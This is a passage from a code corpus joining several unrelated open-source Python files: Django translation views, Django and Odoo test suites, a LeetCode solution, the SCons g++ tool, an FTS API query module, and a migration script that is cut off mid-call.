autotranslate_settings=autotranslate_settings,
autotranslate_i18n_lang_name=autotranslate_i18n_lang_name,
autotranslate_i18n_lang_code=autotranslate_i18n_lang_code,
autotranslate_i18n_lang_bidi=autotranslate_i18n_lang_bidi,
autotranslate_last_save_error=autotranslate_last_save_error,
autotranslate_i18n_filter=autotranslate_i18n_filter,
autotranslate_i18n_write=autotranslate_i18n_write,
autotranslate_messages=autotranslate_messages,
page_range=needs_pagination and page_range,
needs_pagination=needs_pagination,
main_language=main_language,
autotranslate_i18n_app=autotranslate_i18n_app,
page=page,
query=query,
paginator=paginator,
autotranslate_i18n_pofile=autotranslate_i18n_pofile,
ref_lang=ref_lang,
))
else:
return list_languages(request, do_session_warn=True)
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def download_file(request):
import zipfile
storage = get_storage(request)
# original filename
autotranslate_i18n_fn = storage.get('autotranslate_i18n_fn', None)
# in-session modified catalog
autotranslate_i18n_pofile = storage.get('autotranslate_i18n_pofile', None)
# language code
autotranslate_i18n_lang_code = storage.get('autotranslate_i18n_lang_code', None)
if not autotranslate_i18n_lang_code or not autotranslate_i18n_pofile or not autotranslate_i18n_fn:
return HttpResponseRedirect(reverse('autotranslate-home'))
try:
if len(autotranslate_i18n_fn.split('/')) >= 5:
offered_fn = '_'.join(autotranslate_i18n_fn.split('/')[-5:])
else:
offered_fn = autotranslate_i18n_fn.split('/')[-1]
po_fn = str(autotranslate_i18n_fn.split('/')[-1])
mo_fn = str(po_fn.replace('.po', '.mo')) # not so smart, huh
zipdata = six.BytesIO()
zipf = zipfile.ZipFile(zipdata, mode="w")
zipf.writestr(po_fn, six.text_type(autotranslate_i18n_pofile).encode("utf8"))
zipf.writestr(mo_fn, autotranslate_i18n_pofile.to_binary())
zipf.close()
zipdata.seek(0)
response = HttpResponse(zipdata.read())
response['Content-Disposition'] = 'attachment; filename=%s.%s.zip' % (offered_fn, autotranslate_i18n_lang_code)
response['Content-Type'] = 'application/x-zip'
return response
except Exception:
return HttpResponseRedirect(reverse('autotranslate-home'))
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def list_languages(request, do_session_warn=False):
"""
Lists the languages for the current project, the gettext catalog files
that can be translated and their translation progress
"""
storage = get_storage(request)
languages = []
if 'filter' in request.GET:
if request.GET.get('filter') in ('project', 'third-party', 'django', 'all'):
filter_ = request.GET.get('filter')
storage.set('autotranslate_i18n_catalog_filter', filter_)
return HttpResponseRedirect(reverse('autotranslate-pick-file'))
autotranslate_i18n_catalog_filter = storage.get('autotranslate_i18n_catalog_filter', 'project')
third_party_apps = autotranslate_i18n_catalog_filter in ('all', 'third-party')
django_apps = autotranslate_i18n_catalog_filter in ('all', 'django')
project_apps = autotranslate_i18n_catalog_filter in ('all', 'project')
has_pos = False
for language in settings.LANGUAGES:
if not can_translate_language(request.user, language[0]):
continue
pos = find_pos(language[0], project_apps=project_apps, django_apps=django_apps, third_party_apps=third_party_apps)
has_pos = has_pos or len(pos)
languages.append(
(
language[0],
_(language[1]),
sorted([(get_app_name(l), os.path.realpath(l), pofile(l)) for l in pos], key=lambda app: app[0]),
)
)
try:
ADMIN_MEDIA_PREFIX = settings.ADMIN_MEDIA_PREFIX
except AttributeError:
ADMIN_MEDIA_PREFIX = settings.STATIC_URL + 'admin/'
do_session_warn = do_session_warn and 'SessionAutotranslateStorage' in autotranslate_settings.STORAGE_CLASS and 'signed_cookies' in settings.SESSION_ENGINE
return render(request, 'autotranslate/languages.html', dict(
version=autotranslate.get_version(True),
ADMIN_MEDIA_PREFIX=ADMIN_MEDIA_PREFIX,
do_session_warn=do_session_warn,
languages=languages,
has_pos=has_pos,
autotranslate_i18n_catalog_filter=autotranslate_i18n_catalog_filter
))
def get_app_name(path):
app = path.split("/locale")[0].split("/")[-1]
return app
@never_cache
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def lang_sel(request, langid, idx):
"""
Selects a file to be translated
"""
storage = get_storage(request)
if langid not in [l[0] for l in settings.LANGUAGES] or not can_translate_language(request.user, langid):
raise Http404
else:
autotranslate_i18n_catalog_filter = storage.get('autotranslate_i18n_catalog_filter', 'project')
third_party_apps = autotranslate_i18n_catalog_filter in ('all', 'third-party')
django_apps = autotranslate_i18n_catalog_filter in ('all', 'django')
project_apps = autotranslate_i18n_catalog_filter in ('all', 'project')
file_ = sorted(find_pos(langid, project_apps=project_apps, django_apps=django_apps, third_party_apps=third_party_apps), key=get_app_name)[int(idx)]
storage.set('autotranslate_i18n_lang_code', langid)
storage.set('autotranslate_i18n_lang_name', six.text_type([l[1] for l in settings.LANGUAGES if l[0] == langid][0]))
storage.set('autotranslate_i18n_fn', file_)
po = pofile(file_)
for entry in po:
entry.md5hash = hashlib.new(
'md5',
(six.text_type(entry.msgid) +
six.text_type(entry.msgstr) +
six.text_type(entry.msgctxt or "")).encode('utf8')
).hexdigest()
storage.set('autotranslate_i18n_pofile', po)
try:
os.utime(file_, None)
storage.set('autotranslate_i18n_write', True)
except OSError:
storage.set('autotranslate_i18n_write', False)
return HttpResponseRedirect(reverse('autotranslate-home'))
def ref_sel(request, langid):
storage = get_storage(request)
ALLOWED_LANGUAGES = [l[0] for l in settings.LANGUAGES] + ['msgid']
if langid not in ALLOWED_LANGUAGES:
raise Http404
storage.set('autotranslate_i18n_ref_lang_code', langid)
return HttpResponseRedirect(reverse('autotranslate-home'))
ref_sel = never_cache(ref_sel)
ref_sel = user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)(ref_sel)
@user_passes_test(lambda user: can_translate(user), settings.LOGIN_URL)
def translate_text(request):
language_from = request.GET.get('from', None)
language_to = request.GET.get('to', None)
text = request.GET.get('text', None)
if language_from == language_to:
data = {'success': True, 'translation': text}
else:
# run the translation:
AZURE_CLIENT_ID = getattr(settings, 'AZURE_CLIENT_ID', None)
AZURE_CLIENT_SECRET = getattr(settings, 'AZURE_CLIENT_SECRET', None)
translator = Translator(AZURE_CLIENT_ID, AZURE_CLIENT_SECRET)
try:
translated_text = translator.translate(text, language_to, language_from)
data = {'success': True, 'translation': translated_text}
except TranslateApiException as e:
data = {'success': False, 'error': "Translation API Exception: {0}".format(e.message)}
return HttpResponse(json.dumps(data), content_type='application/json')
|
dadasoz/dj-translate
|
autotranslate/views.py
|
Python
|
mit
| 22,363
|
# coding=utf-8
from django.contrib.auth.models import User, Group
from django.test.testcases import TestCase
from grading.models import *
from grading.autograding import get_autograders
class StudentTest(TestCase):
def test_user_creation_creates_student(self):
u = User.objects.create(username = "test1", email="foo@foo.pl")
u.groups.add(Group.objects.get(name = "students"))
u.save()
qs = Student.objects.filter(user=u)
self.assertEqual(len(qs), 1)
def test_can_update_user(self):
u = User.objects.create(username = "test1", email="foo@foo.pl")
u.groups.add(Group.objects.get(name = "students"))
u.save()
u.email = "bar@bar.pl"
u.save()
def test_student_not_created_for_inactive_users(self):
u = User.objects.create(username = "test1", email="foo@foo.pl", is_active=False)
u.groups.add(Group.objects.get(name = "students"))
u.save()
qs = Student.objects.filter(user=u)
self.assertEqual(len(qs), 0)
def test_student_not_created_for_staff_users(self):
u = User.objects.create(username = "test1", email="foo@foo.pl", is_staff=True)
u.groups.add(Group.objects.get(name = "students"))
u.save()
qs = Student.objects.filter(user=u)
self.assertEqual(len(qs), 0)
class ActivityTest(TestCase):
def test_sort_key_auto_set(self):
a = GradeableActivity.objects.create(name="foo")
self.assertEqual(a.sort_key, "foo")
class TestFixture(TestCase):
def setUp(self):
self.u = User.objects.create(username = "test1", email="foo@foo.pl")
self.u.groups.add(Group.objects.get(name = "students"))
self.u.save()
self.student = Student.objects.filter(user=self.u).get()
self.other_user = User.objects.create(username = "other", email="foo@foo.pl")
self.other_user.groups.add(Group.objects.get(name = "students"))
self.other_user.save()
        self.other_student = Student.objects.filter(user=self.other_user).get()
self.group = Course.objects.create(name = "course")
self.other_group = Course.objects.create(name = "other_group")
self.student.course = self.group
self.student.save()
self.other_student.course = self.other_group
self.other_student.save()
self.activity = GradeableActivity(name = "activity")
self.activity.save()
self.activity.courses.add(self.group)
self.activity.save()
self.otheractivity = GradeableActivity(name = "other")
self.otheractivity.save()
self.otheractivity.courses.add(self.other_group)
self.otheractivity.save()
class TestGrades(TestFixture):
def test_sync_grades_when_activity_is_added_to_group(self):
        # After setup it should be so:
        self.assertEqual(len(self.student.grades.all()), 1)
        # Other student shouldn't change
        self.assertEqual(len(self.other_student.grades.all()), 1)
activity = GradeableActivity(name = "activity2")
activity.save()
activity.courses.add(self.group)
activity.save()
        # Now we should have two grades
        self.assertEqual(len(self.student.grades.all()), 2)
        # Other student shouldn't change
self.assertEqual(len(self.other_student.grades.all()), 1)
for g in self.student.grades.all():
self.assertEqual(g.grade, 2.0)
def test_sync_grades_when_student_is_added_to_group(self):
u = User.objects.create(username = "test2", email="foo@foo.pl")
u.groups.add(Group.objects.get(name = "students"))
u.save()
student = Student.objects.filter(user=u).get()
# Before addition there should be no grades
self.assertEqual(len(student.grades.all()), 0)
student.course = self.group
student.save()
self.assertEqual(len(student.grades.all()), 1)
class TestGrading(TestFixture):
def setUp(self):
super(TestGrading, self).setUp()
self.grade_part_1 = GradePart.objects.create(
weight = 1,
required = True,
activity = self.activity,
name = "Zadanie 1"
)
self.grade_part_2 = GradePart.objects.create(
weight = 2,
required = False,
activity = self.activity,
name = "Zadanie 2"
)
self.activity.default_grade = 812.0
self.activity.save()
    def test_default_grade_returned_when_all_activities_unfinished(self):
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
self.assertIn('Zadanie 1', sg.short_description)
    def test_default_grade_returned_when_required_activities_unfinished(self):
GradePart.objects.grade(self.grade_part_2, self.student, 5)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
self.assertIn('Zadanie 1', sg.short_description)
    def test_grade_calculated_when_all_required_activities_finished(self):
GradePart.objects.grade(self.grade_part_1, self.student, 5)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 3)
def test_grade_calculated_when_all_activities_finished(self):
GradePart.objects.grade(self.grade_part_2, self.student, 3)
GradePart.objects.grade(self.grade_part_1, self.student, 3)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 3)
    def test_default_grade_returned_when_required_activity_has_grade_below_passing(self):
GradePart.objects.grade(self.grade_part_1, self.student, 2)
GradePart.objects.grade(self.grade_part_2, self.student, 3)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
def test_grade_gets_updated(self):
GradePart.objects.grade(self.grade_part_1, self.student, 5.0)
self.assertEqual(StudentGrade.objects.get(student=self.student, activity=self.activity).grade, 3)
def test_grade_gets_updated_if_we_add_new_grade_part(self):
        # Updates the database so the grade is calculated
        self.test_grade_calculated_when_all_activities_finished()
        # Sanity check
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertNotEqual(sg.grade, 812.0)
GradePart.objects.create(
name = "test-xxx",
required = True,
activity = self.activity,
)
sg = StudentGrade()
grade_student(self.activity, self.student, sg)
self.assertEqual(sg.grade, 812.0)
class TestAutogradeableGradePart(TestFixture):
def test_name_is_set(self):
model = AutogradeableGradePart.objects.create(
activity = self.activity,
autograding_controller = get_autograders()['test']
)
self.assertEqual(model.name, model.autograding_controller)
|
jbzdak/data-base-checker
|
grading/tests/test_models.py
|
Python
|
gpl-3.0
| 7,167
|
# Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)
# Copyright 2015-2019 Tecnativa - Pedro M. Baeza
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import odoo.tests.common as common
from odoo import fields
class TestPurchaseOrder(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestPurchaseOrder, cls).setUpClass()
cls.categ_cost_average = cls.env["product.category"].create(
{"name": "Average cost method category", "property_cost_method": "average"}
)
product_obj = cls.env["product.product"]
cls.product_1 = product_obj.create(
{"name": "Test product 1", "categ_id": cls.categ_cost_average.id}
)
cls.product_2 = product_obj.create({"name": "Test product 2"})
po_model = cls.env["purchase.order.line"]
currency_rate_model = cls.env["res.currency.rate"]
# Set the Exchange rate for the currency of the company to 1
# to avoid issues with rates
latest_currency_rate_line = currency_rate_model.search(
[
("currency_id", "=", cls.env.user.company_id.currency_id.id),
("name", "=", fields.Date.today()),
],
limit=1,
)
if latest_currency_rate_line and latest_currency_rate_line.rate != 1.0:
latest_currency_rate_line.rate = 1.0
elif not latest_currency_rate_line:
currency_rate_model.create(
{
"currency_id": cls.env.user.company_id.currency_id.id,
"rate": 1.00,
"name": fields.Date.today(),
}
)
cls.purchase_order = cls.env["purchase.order"].create(
{"partner_id": cls.env.ref("base.res_partner_3").id}
)
cls.po_line_1 = po_model.create(
{
"order_id": cls.purchase_order.id,
"product_id": cls.product_1.id,
"date_planned": fields.Datetime.now(),
"name": "Test",
"product_qty": 1.0,
"product_uom": cls.product_1.uom_id.id,
"discount": 50.0,
"price_unit": 10.0,
"taxes_id": [],
}
)
cls.account = cls.env["account.account"].create(
{
"name": "Test account",
"code": "TEST",
"user_type_id": cls.env.ref("account.data_account_type_expenses").id,
}
)
cls.tax = cls.env["account.tax"].create(
{
"name": "Sample tax 15%",
"amount_type": "percent",
"type_tax_use": "purchase",
"amount": 15.0,
"invoice_repartition_line_ids": [
(0, 0, {"factor_percent": 100, "repartition_type": "base"}),
(
0,
0,
{
"factor_percent": 100,
"repartition_type": "tax",
"account_id": cls.account.id,
},
),
],
}
)
cls.po_line_2 = po_model.create(
{
"order_id": cls.purchase_order.id,
"product_id": cls.product_2.id,
"date_planned": fields.Datetime.now(),
"name": "Test",
"product_qty": 10.0,
"product_uom": cls.product_2.uom_id.id,
"discount": 30,
"taxes_id": [(6, 0, [cls.tax.id])],
"price_unit": 230.0,
}
)
cls.po_line_3 = po_model.create(
{
"order_id": cls.purchase_order.id,
"product_id": cls.product_2.id,
"date_planned": fields.Datetime.now(),
"name": "Test",
"product_qty": 1.0,
"product_uom": cls.product_2.uom_id.id,
"discount": 0,
"taxes_id": [(6, 0, [cls.tax.id])],
"price_unit": 10.0,
}
)
def test_purchase_order_vals(self):
self.assertEqual(self.po_line_1.price_subtotal, 5.0)
self.assertEqual(self.po_line_2.price_subtotal, 1610.0)
self.assertEqual(self.po_line_3.price_subtotal, 10.0)
self.assertEqual(self.purchase_order.amount_untaxed, 1625.0)
self.assertEqual(self.purchase_order.amount_tax, 243)
# Change price to launch a recalculation of totals
self.po_line_1.discount = 60
self.assertEqual(self.po_line_1.price_subtotal, 4.0)
self.assertEqual(self.purchase_order.amount_untaxed, 1624.0)
self.assertEqual(self.purchase_order.amount_tax, 243)
def test_move_price_unit(self):
self.purchase_order.button_confirm()
picking = self.purchase_order.picking_ids
moves = picking.move_lines
move1 = moves.filtered(lambda x: x.purchase_line_id == self.po_line_1)
self.assertEqual(move1.price_unit, 5)
move2 = moves.filtered(lambda x: x.purchase_line_id == self.po_line_2)
self.assertEqual(move2.price_unit, 161)
move3 = moves.filtered(lambda x: x.purchase_line_id == self.po_line_3)
self.assertEqual(move3.price_unit, 10)
# Confirm the picking to see the cost price
move1.move_line_ids.qty_done = 1
picking._action_done()
self.assertAlmostEqual(self.product_1.standard_price, 5.0)
# Check data in PO remains the same - This is due to the hack
self.assertAlmostEqual(self.po_line_1.price_unit, 10.0)
self.assertAlmostEqual(self.po_line_1.discount, 50.0)
def test_report_price_unit(self):
rec = self.env["purchase.report"].search(
[("product_id", "=", self.product_1.id)]
)
self.assertEqual(rec.price_total, 5)
self.assertEqual(rec.discount, 50)
def test_invoice(self):
invoice = self.env["account.move"].new(
{
"move_type": "out_invoice",
"partner_id": self.env.ref("base.res_partner_3").id,
"purchase_id": self.purchase_order.id,
}
)
invoice._onchange_purchase_auto_complete()
line = invoice.invoice_line_ids.filtered(
lambda x: x.purchase_line_id == self.po_line_1
)
self.assertEqual(line.discount, 50)
line = invoice.invoice_line_ids.filtered(
lambda x: x.purchase_line_id == self.po_line_2
)
self.assertEqual(line.discount, 30)
line = invoice.invoice_line_ids.filtered(
lambda x: x.purchase_line_id == self.po_line_3
)
self.assertEqual(line.discount, 0)
|
OCA/purchase-workflow
|
purchase_discount/tests/test_purchase_discount.py
|
Python
|
agpl-3.0
| 6,834
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Odoo, an open source suite of business apps
# This module copyright (C) 2015 bloopark systems (<http://bloopark.de>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.models import TransientModel
from openerp import fields
class WebsiteConfigSettings(TransientModel):
_inherit = 'website.config.settings'
compress_html = fields.Boolean(
string='Compress HTML',
related='website_id.compress_html',
        help='Compress HTML code output'
)
|
blooparksystems/website
|
website_compress_html/models/res_config.py
|
Python
|
agpl-3.0
| 1,280
|
# coding=utf-8
import unittest
"""114. Flatten Binary Tree to Linked List
https://leetcode.com/problems/flatten-binary-tree-to-linked-list/description/
Given a binary tree, flatten it to a linked list in-place.
For example, given the following tree:
1
/ \
2 5
/ \ \
3 4 6
The flattened tree should look like:
1
\
2
\
3
\
4
\
5
\
6
Similar Questions:
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def flatten(self, root):
        """
        :type root: TreeNode
        :rtype: void Do not return anything, modify root in-place instead.
        """
        # Splice each left subtree between its node and the node's right
        # subtree, collapsing the tree into a right-leaning "linked list"
        # in O(1) extra space.
        node = root
        while node:
            if node.left:
                rightmost = node.left
                while rightmost.right:
                    rightmost = rightmost.right
                rightmost.right = node.right
                node.right = node.left
                node.left = None
            node = node.right
def test(self):
pass
if __name__ == "__main__":
unittest.main()
|
openqt/algorithms
|
leetcode/python/lc114-flatten-binary-tree-to-linked-list.py
|
Python
|
gpl-3.0
| 1,001
|
__author__ = 'Leonardo De Macedo'
|
macedoleonardo/WebTesting-Python-Behave
|
pages/__init__.py
|
Python
|
gpl-2.0
| 35
|
"""
Provides queries against the FTS API, fetching JSON and translating it into pandas dataframes.
Unfortunately it doesn't make the structure of the returned data explicit; that is all handled by pandas.
At some point we may want to create dedicated classes for each type of data returned by the API, to do validation etc.,
but then we'll also need to implement join logic between these classes.
"""
import pandas as pd
FTS_BASE_URL = 'http://fts.unocha.org/api/v1/'
JSON_SUFFIX = '.json'
def fetch_json_as_dataframe(url):
return pd.read_json(url)
def fetch_json_as_dataframe_with_id(url):
dataframe = fetch_json_as_dataframe(url)
if 'id' in dataframe.columns:
return dataframe.set_index('id')
else:
return dataframe # happens with an empty result
def build_json_url(middle_part):
return FTS_BASE_URL + middle_part + JSON_SUFFIX
def convert_date_columns_from_string_to_timestamp(dataframe, column_names):
for column_name in column_names:
        # pd.datetools.parse was removed from newer pandas; pd.to_datetime is the stable equivalent
        dataframe[column_name] = pd.to_datetime(dataframe[column_name])
def fetch_sectors_json_as_dataframe():
return fetch_json_as_dataframe_with_id(build_json_url('Sector'))
def fetch_countries_json_as_dataframe():
return fetch_json_as_dataframe_with_id(build_json_url('Country'))
def fetch_organizations_json_as_dataframe():
return fetch_json_as_dataframe_with_id(build_json_url('Organization'))
def fetch_emergencies_json_for_country_as_dataframe(country):
"""
This accepts both names ("Slovakia") and ISO country codes ("SVK")
"""
return fetch_json_as_dataframe_with_id(build_json_url('Emergency/country/' + country))
def fetch_emergencies_json_for_year_as_dataframe(year):
return fetch_json_as_dataframe_with_id(build_json_url('Emergency/year/' + str(year)))
def fetch_appeals_json_as_dataframe_given_url(url):
dataframe = fetch_json_as_dataframe_with_id(url)
convert_date_columns_from_string_to_timestamp(dataframe, ['start_date', 'end_date', 'launch_date'])
return dataframe
def fetch_appeals_json_for_country_as_dataframe(country):
"""
This accepts both names ("Slovakia") and ISO country codes ("SVK")
"""
return fetch_appeals_json_as_dataframe_given_url(build_json_url('Appeal/country/' + country))
def fetch_appeals_json_for_year_as_dataframe(year):
return fetch_appeals_json_as_dataframe_given_url(build_json_url('Appeal/year/' + str(year)))
def fetch_projects_json_for_appeal_as_dataframe(appeal_id):
dataframe = fetch_json_as_dataframe_with_id(build_json_url('Project/appeal/' + str(appeal_id)))
if not dataframe.empty: # guard against empty result
convert_date_columns_from_string_to_timestamp(dataframe, ['end_date', 'last_updated_datetime'])
return dataframe
def fetch_clusters_json_for_appeal_as_dataframe(appeal_id):
# NOTE no id present in this data
return fetch_json_as_dataframe(build_json_url('Cluster/appeal/' + str(appeal_id)))
def fetch_contributions_json_as_dataframe_given_url(url):
dataframe = fetch_json_as_dataframe_with_id(url)
if not dataframe.empty: # guard against empty result
convert_date_columns_from_string_to_timestamp(dataframe, ['decision_date'])
return dataframe
def fetch_contributions_json_for_appeal_as_dataframe(appeal_id):
return fetch_contributions_json_as_dataframe_given_url(build_json_url('Contribution/appeal/' + str(appeal_id)))
def fetch_contributions_json_for_emergency_as_dataframe(emergency_id):
return fetch_contributions_json_as_dataframe_given_url(
build_json_url('Contribution/emergency/' + str(emergency_id)))
def fetch_grouping_type_json_for_appeal_as_dataframe(middle_part, appeal_id, grouping=None, alias=None):
"""
Grouping can be one of:
Donor
Recipient
Sector
Emergency
Appeal
Country
Cluster
Alias is used to name the grouping type column and use it as an index.
"""
url = build_json_url(middle_part) + '?Appeal=' + str(appeal_id)
if grouping:
url += '&GroupBy=' + grouping
# NOTE no id present in this data
raw_dataframe = fetch_json_as_dataframe(url)
# oddly the JSON of interest is nested inside the "grouping" element
processed_frame = pd.DataFrame.from_records(raw_dataframe.grouping.values)
if alias:
processed_frame = processed_frame.rename(columns={'type': alias, 'amount': middle_part})
processed_frame = processed_frame.set_index(alias)
return processed_frame
def fetch_funding_json_for_appeal_as_dataframe(appeal_id, grouping=None, alias=None):
"""
Committed or contributed funds, including carry over from previous years
"""
return fetch_grouping_type_json_for_appeal_as_dataframe("funding", appeal_id, grouping, alias)
def fetch_pledges_json_for_appeal_as_dataframe(appeal_id, grouping=None, alias=None):
"""
Contains uncommitted pledges, not funding that has already processed to commitment or contribution stages
"""
return fetch_grouping_type_json_for_appeal_as_dataframe("pledges", appeal_id, grouping, alias)
if __name__ == "__main__":
# test various fetch commands (requires internet connection)
country = 'Chad'
appeal_id = 942
print fetch_sectors_json_as_dataframe()
print fetch_emergencies_json_for_country_as_dataframe(country)
print fetch_projects_json_for_appeal_as_dataframe(appeal_id)
print fetch_funding_json_for_appeal_as_dataframe(appeal_id)
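    # a grouped variant (valid grouping values are listed in the
    # fetch_grouping_type_json_for_appeal_as_dataframe docstring):
    print fetch_funding_json_for_appeal_as_dataframe(appeal_id, grouping='Donor', alias='donor')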
|
luiscape/fts-collector
|
ckan_loading/fts_queries.py
|
Python
|
unlicense
| 5,501
|
#!/usr/bin/python
import unittest as u
import os
rootDir = '../src/'
javaBlacklistFile = '../src/javaswig_blacklist'
pythonBlacklistFile = '../src/pythonswig_blacklist'
nodeBlacklistFile = '../src/nodeswig_blacklist'
class BlacklistConsistency(u.TestCase):
    def check_blacklist(self, blacklistFile, prefix, swigName):
        """Fail if a blacklisted library still ships its SWIG interface file."""
        with open(blacklistFile) as f:
            blacklist = [line.rstrip('\r\n') for line in f]
        for libraryName in blacklist:
            files = os.listdir(os.path.join(rootDir, libraryName))
            interfaceFileName = prefix + libraryName + ".i"
            if interfaceFileName in files:
                self.fail("\n" + libraryName + " is in " + swigName + " blacklist.\n" +
                          "Remove it from blacklist or remove " +
                          interfaceFileName + " from sources.")
    def test_java_blacklist(self):
        self.check_blacklist(javaBlacklistFile, "", "javaswig")
    def test_python_blacklist(self):
        self.check_blacklist(pythonBlacklistFile, "pyupm_", "pythonswig")
    def test_node_blacklist(self):
        self.check_blacklist(nodeBlacklistFile, "jsupm_", "nodeswig")
if __name__ == '__main__':
u.main()
|
pylbert/upm
|
tests/check_consistency.py
|
Python
|
mit
| 2,086
|
"""SCons.Tool.g++
Tool-specific initialization for g++.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/g++.py 3842 2008/12/20 22:59:52 scons"
import os.path
import re
import subprocess
import SCons.Tool
import SCons.Util
cplusplus = __import__('c++', globals(), locals(), [])
compilers = ['g++']
def generate(env):
"""Add Builders and construction variables for g++ to an Environment."""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
cplusplus.generate(env)
env['CXX'] = env.Detect(compilers)
# platform specific settings
if env['PLATFORM'] == 'aix':
env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS -mminimal-toc')
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1
env['SHOBJSUFFIX'] = '$OBJSUFFIX'
elif env['PLATFORM'] == 'hpux':
env['SHOBJSUFFIX'] = '.pic.o'
elif env['PLATFORM'] == 'sunos':
env['SHOBJSUFFIX'] = '.pic.o'
# determine compiler version
if env['CXX']:
#pipe = SCons.Action._subproc(env, [env['CXX'], '-dumpversion'],
pipe = SCons.Action._subproc(env, [env['CXX'], '--version'],
stdin = 'devnull',
stderr = 'devnull',
stdout = subprocess.PIPE)
if pipe.wait() != 0: return
# -dumpversion was added in GCC 3.0. As long as we're supporting
# GCC versions older than that, we should use --version and a
# regular expression.
#line = pipe.stdout.read().strip()
#if line:
# env['CXXVERSION'] = line
line = pipe.stdout.readline()
match = re.search(r'[0-9]+(\.[0-9]+)+', line)
if match:
env['CXXVERSION'] = match.group(0)
def exists(env):
return env.Detect(compilers)
|
makinacorpus/mapnik2
|
scons/scons-local-1.2.0/SCons/Tool/g++.py
|
Python
|
lgpl-2.1
| 3,111
|
#! /usr/bin/env python
from skool.utils import *
restore_db()
|
daeatel/skool
|
bin/import_data_backup.py
|
Python
|
mit
| 63
|
import os
os.environ['DJANGO_SETTINGS_MODULE']='solalim.settings'
import sys
sys.path += ["."]
from django import setup
setup()
import json
from floreal.models import *
from collections import defaultdict
FILE_NAME="./floreal-dump-2020-07-21.json"
x = defaultdict(list)
# Sort model elements by model class name
for y in json.load(open(FILE_NAME)):
k = y['model'].split(".")[-1]
x[k].append(y)
phones = { # username -> phone:str
y['fields']['user'][0]: y['fields']['phone']
for y in x['userphones']
}
users = {}  # username -> User
# Create missing users
if True:
user_fields = 'password is_superuser username first_name last_name email is_staff is_active date_joined'.split()
print("Migrate users")
for kwargs in x['user']:
f = kwargs['fields']
defaults = {k: f[k] for k in user_fields}
k = f['username']
u, created = User.objects.get_or_create(username=k, defaults=defaults)
print(f" {'-' if created else '+'} {k}")
users[k] = u
phone = phones.get(u.username)
if phone:
UserPhone.objects.get_or_create(user=u, defaults={"phone": phone})
else:
for u in User.objects.all():
users[u.username] = u
global_staff = set(User.objects.filter(is_staff=True))
floreal = next(nw for nw in x['network'] if nw['fields']['name']=='Floreal')
nwid = floreal['pk']
nw, created = Network.objects.get_or_create(name='Floreal', defaults={'auto_validate': False})
nw_staff = {User.objects.get(username=y[0]) for y in floreal['fields']['staff']}
if True:
# Convert floreal subgroups
print("Floreal subgroups")
for kwargs in x['subgroup']:
f = kwargs['fields']
if f['network'] != nwid:
continue
print(f" - {f['name']}")
xtra = User.objects.get(username=f['extra_user'][0])
        xtra.is_active = False
        xtra.save()
sg = NetworkSubgroup.objects.create(name=f['name'], network=nw)
buyers = {users[y[0]] for y in f['users']}
substaff = {users[y[0]] for y in f['staff']}
for u in buyers | substaff:
if not u.is_active:
continue
nm = NetworkMembership.objects.create(
user=u,
network=nw,
subgroup=sg,
is_buyer=u in buyers,
is_subgroup_staff=u in substaff,
is_staff=u in global_staff
)
# Migrate other, mono-group networks
print("Other networks")
for kwargs in x['network']:
f = kwargs['fields']
if f['name'] == 'Floreal':
continue # Already handled
    nw_id = kwargs['pk']
nw, created = Network.objects.get_or_create(
name=f['name'],
auto_validate=f['auto_validate'],
)
if not created:
continue
print(f" - {nw.name}")
(sgf,) = [sg['fields'] for sg in x['subgroup'] if sg['fields']['network'] == nw_id]
buyers = {users[y[0]] for y in sgf['users']}
substaff = {users[y[0]] for y in sgf['staff']}
for u in buyers | substaff | global_staff:
nm = NetworkMembership.objects.create(
user=u,
network=nw,
is_buyer=u in buyers,
is_subgroup_staff=u in substaff,
